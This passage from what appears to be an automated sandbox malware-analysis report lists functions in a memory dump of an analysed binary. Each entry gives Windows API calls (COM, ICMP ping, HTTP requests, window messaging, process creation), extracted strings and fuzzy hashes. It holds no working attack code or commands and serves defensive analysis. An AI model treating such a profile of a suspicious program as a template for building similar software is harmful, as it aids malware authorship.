                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00116CDC
                                                        • VariantClear.OLEAUT32(?), ref: 00116CEE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00116CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 1afd28ef104f4e3cc9137cf76d4d7448f7691e3be21862ddf829822bbe0a9e07
                                                        • Instruction ID: c3023c638f972db1f662cedac8bef69d56da02ca1ea67852d368e30701be763a
                                                        • Opcode Fuzzy Hash: 1afd28ef104f4e3cc9137cf76d4d7448f7691e3be21862ddf829822bbe0a9e07
                                                        • Instruction Fuzzy Hash: 0F415135A001199FCF04DF68D848EEEBBB9EF48354F058079E955E7361DB31A986CB90
                                                        Function 001383BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • CoInitialize.OLE32 ref: 00138403
                                                        • CoUninitialize.OLE32 ref: 0013840E
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00152BEC,?), ref: 0013846E
                                                        • IIDFromString.OLE32(?,?), ref: 001384E1
                                                        • VariantInit.OLEAUT32(?), ref: 0013857B
                                                        • VariantClear.OLEAUT32(?), ref: 001385DC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: 143c066ac59e54af489f03b5b9a673741c2c57f57ecdd7fb422bea8705d91354
                                                        • Instruction ID: d180b8b5ab1321e535faaa1927c64555561a5c0102fbc38001c5c9112e7f5a05
                                                        • Opcode Fuzzy Hash: 143c066ac59e54af489f03b5b9a673741c2c57f57ecdd7fb422bea8705d91354
                                                        • Instruction Fuzzy Hash: 6D61CF70608312AFC714DF64D848FAEBBE8AF49754F04491DF9859B2A1CB70ED48CB92
                                                        Function 00135732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00135793
                                                        • inet_addr.WSOCK32(?), ref: 001357D8
                                                        • gethostbyname.WSOCK32(?), ref: 001357E4
                                                        • IcmpCreateFile.IPHLPAPI ref: 001357F2
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00135862
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00135878
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001358ED
                                                        • WSACleanup.WSOCK32 ref: 001358F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 2078df08164ad0626446a0c66578cd9195aeaceef88a99acdf4a0c67a61f5d4f
                                                        • Instruction ID: 5cb109cc76564500edfc3c880435f695f9e2b005cb60928bd25270cd40a773a1
                                                        • Opcode Fuzzy Hash: 2078df08164ad0626446a0c66578cd9195aeaceef88a99acdf4a0c67a61f5d4f
                                                        • Instruction Fuzzy Hash: F9518B35604600DFDB10EF25DC49B6ABBE5EF49B20F04496DF99ADB2A1DB30E841DB42
                                                        Function 0012B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0012B4D0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0012B546
                                                        • GetLastError.KERNEL32 ref: 0012B550
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0012B5BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 699ab69d74c694d2e337576e6879b53bbea89731dfd3f90de2139c9db0dba98d
                                                        • Instruction ID: a7451966ff737723c12c62552a12d3336cca7fd6d3700b7278774ae15000c307
                                                        • Opcode Fuzzy Hash: 699ab69d74c694d2e337576e6879b53bbea89731dfd3f90de2139c9db0dba98d
                                                        • Instruction Fuzzy Hash: 4431C435A04215DFCB04DF68E889FAE7BB4FF09300F148069F505DB292DB709A96CB81
                                                        Function 00118F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00119014
                                                        • GetDlgCtrlID.USER32 ref: 0011901F
                                                        • GetParent.USER32 ref: 0011903B
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0011903E
                                                        • GetDlgCtrlID.USER32(?), ref: 00119047
                                                        • GetParent.USER32(?), ref: 00119063
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00119066
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: d9b26064a19449be8db412ac68bac75aba7b93f4f3b06aeea3abfb88f3b23945
                                                        • Instruction ID: 439edb4abe58a0278decf3a92a615f0ecdd56f348278b80a7c2f04ecdfcd489a
                                                        • Opcode Fuzzy Hash: d9b26064a19449be8db412ac68bac75aba7b93f4f3b06aeea3abfb88f3b23945
                                                        • Instruction Fuzzy Hash: BC21D678A00108BBDF08ABA0CC95EFEBB78EF49310F104169B961972F2DB755895DA20
                                                        Function 0011907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001190FD
                                                        • GetDlgCtrlID.USER32 ref: 00119108
                                                        • GetParent.USER32 ref: 00119124
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00119127
                                                        • GetDlgCtrlID.USER32(?), ref: 00119130
                                                        • GetParent.USER32(?), ref: 0011914C
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0011914F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: e6230e71bb44724dbe48ae4946a73713d421988536497dda6db755d5f4f113dd
                                                        • Instruction ID: 44600e461dc5d04541e29439c506b38598307229a8d7b5dd2b42fa02ea602b0e
                                                        • Opcode Fuzzy Hash: e6230e71bb44724dbe48ae4946a73713d421988536497dda6db755d5f4f113dd
                                                        • Instruction Fuzzy Hash: 4A2107B8A01108BBDF04ABA0CC85FFEBB78EF49300F014029F925972B2DB755895DB20
                                                        Function 00119163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32 ref: 0011916F
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00119184
                                                        • _wcscmp.LIBCMT ref: 00119196
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00119211
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: 98d8c10e17961048bafa7f4b90ac21c12812dacf6bca8797beda11e07ca0ca6f
                                                        • Instruction ID: 5bb8598e6638b5c4e81bf5ba2d66eb88a6062c3e32408784d9267f88da2eca9f
                                                        • Opcode Fuzzy Hash: 98d8c10e17961048bafa7f4b90ac21c12812dacf6bca8797beda11e07ca0ca6f
                                                        • Instruction Fuzzy Hash: B411597A248307BAFA192624DC1ADE777AC9B11330F200036FA24B15E2FF7168D15990
                                                        Function 001388AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 001388D7
                                                        • CoInitialize.OLE32(00000000), ref: 00138904
                                                        • CoUninitialize.OLE32 ref: 0013890E
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00138A0E
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00138B3B
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00152C0C), ref: 00138B6F
                                                        • CoGetObject.OLE32(?,00000000,00152C0C,?), ref: 00138B92
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00138BA5
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00138C25
                                                        • VariantClear.OLEAUT32(?), ref: 00138C35
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: 2a4c635420218b1fc3e82696526dde3f925742dff1649061e2d2062d3de81833
                                                        • Instruction ID: 31054f87d682b73f0b47aa2e9bf251541aa40a40a5f042e5f154daf5233f18b9
                                                        • Opcode Fuzzy Hash: 2a4c635420218b1fc3e82696526dde3f925742dff1649061e2d2062d3de81833
                                                        • Instruction Fuzzy Hash: F1C146B1208305AFD704DF24C88496BB7E9FF89748F00496DF98A9B261DB71ED46CB52
                                                        Function 00127990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00127A6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: 622fc558432bcf947e8ce336ac310c0c06185958c86c1fc001ff00c0a5dc964a
                                                        • Instruction ID: 5a989fdeb0afa7a5bf5aa7448ecbff66bff3f442cc0c60bfdb27d3cbab810321
                                                        • Opcode Fuzzy Hash: 622fc558432bcf947e8ce336ac310c0c06185958c86c1fc001ff00c0a5dc964a
                                                        • Instruction Fuzzy Hash: 31B1907590822A9FDB00DFA4E885BBFB7F4FF09321F254429E501E7291D734A9A1CB90
                                                        Function 000CFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000CFAA6
                                                        • OleUninitialize.OLE32(?,00000000), ref: 000CFB45
                                                        • UnregisterHotKey.USER32(?), ref: 000CFC9C
                                                        • DestroyWindow.USER32(?), ref: 001045D6
                                                        • FreeLibrary.KERNEL32(?), ref: 0010463B
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00104668
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 40dcb73d62c56a7ad1d3359868ece8c6ef9383e8dce43f8e49a0956d39363ad8
                                                        • Instruction ID: 9cc0a7e150ac82bc0e04c2eae47a08e0cd42b65aff49acd16cabe27b81938662
                                                        • Opcode Fuzzy Hash: 40dcb73d62c56a7ad1d3359868ece8c6ef9383e8dce43f8e49a0956d39363ad8
                                                        • Instruction Fuzzy Hash: 19A157747012128FCB29EF14C994FBDF3A1AF05700F5142ADE94AAB2A2DB71AC56CF51
                                                        Function 0011A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0011A439), ref: 0011A377
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 48632207b596cbfbed71fb89ff0520efff4016216ffdcf9dc2f465a568bb5ca2
                                                        • Instruction ID: d32f2393d5d2243ae44014c260629e01f2e80bbce97f315ec8294da2e4395da8
                                                        • Opcode Fuzzy Hash: 48632207b596cbfbed71fb89ff0520efff4016216ffdcf9dc2f465a568bb5ca2
                                                        • Instruction Fuzzy Hash: 63919331605605AECB0CDFA0C852BEDFFB4BF04314F948139E959A7292DB316AD9CB91
                                                        Function 000C2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 000C2EAE
                                                          • Part of subcall function 000C1DB3: GetClientRect.USER32(?,?), ref: 000C1DDC
                                                          • Part of subcall function 000C1DB3: GetWindowRect.USER32(?,?), ref: 000C1E1D
                                                          • Part of subcall function 000C1DB3: ScreenToClient.USER32(?,?), ref: 000C1E45
                                                        • GetDC.USER32 ref: 000FCD32
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000FCD45
                                                        • SelectObject.GDI32(00000000,00000000), ref: 000FCD53
                                                        • SelectObject.GDI32(00000000,00000000), ref: 000FCD68
                                                        • ReleaseDC.USER32(?,00000000), ref: 000FCD70
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000FCDFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 982f4db58baef03338721f1893aaffb68e5cb939bd42ae4b80ccc511f7b2b0ef
                                                        • Instruction ID: 5b2f1168d5dc11e62ed052c8dac4496a8739c4849af0b6e808edc67582d67dcb
                                                        • Opcode Fuzzy Hash: 982f4db58baef03338721f1893aaffb68e5cb939bd42ae4b80ccc511f7b2b0ef
                                                        • Instruction Fuzzy Hash: 0D71CF3550020DDFDF659F64C981EFE3BB6FF49320F14426AEE556A6A6C7308881EB60
                                                        Function 00131A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00131A50
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00131A7C
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00131ABE
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00131AD3
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00131AE0
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00131B10
                                                        • InternetCloseHandle.WININET(00000000), ref: 00131B57
                                                          • Part of subcall function 00132483: GetLastError.KERNEL32(?,?,00131817,00000000,00000000,00000001), ref: 00132498
                                                          • Part of subcall function 00132483: SetEvent.KERNEL32(?,?,00131817,00000000,00000000,00000001), ref: 001324AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 2603140658-3916222277
                                                        • Opcode ID: 9b20f37eb88adbca4d470cb3749fb45189633e1523d096978ba6c3efecc00b58
                                                        • Instruction ID: 8732f5e45d262ec30f0b16e2a54c6ab8532e99745727c1f16a7e05a782904114
                                                        • Opcode Fuzzy Hash: 9b20f37eb88adbca4d470cb3749fb45189633e1523d096978ba6c3efecc00b58
                                                        • Instruction Fuzzy Hash: BA4192B5501218BFEB119F50CC89FFBBBACEF09355F00412AF905AB251E7749E459BA0
                                                        Function 00138C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0014F910), ref: 00138D28
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0014F910), ref: 00138D5C
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00138ED6
                                                        • SysFreeString.OLEAUT32(?), ref: 00138F00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: 663a01d9cf2de68f6511ae0e388f0f934453ce872578855cde07352fbec3c042
                                                        • Instruction ID: b6dd07df1a2cd88e5fa7cdc3b64134a9b9e7d29360f071adc21873fb7cfbbfd3
                                                        • Opcode Fuzzy Hash: 663a01d9cf2de68f6511ae0e388f0f934453ce872578855cde07352fbec3c042
                                                        • Instruction Fuzzy Hash: 4CF10975A00209EFDF14DF94C888EAEB7B9FF45314F1484A8F905AB251DB71AE46CB90
                                                        Function 0013F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0013F6B5
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0013F848
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0013F86C
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0013F8AC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0013F8CE
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0013FA4A
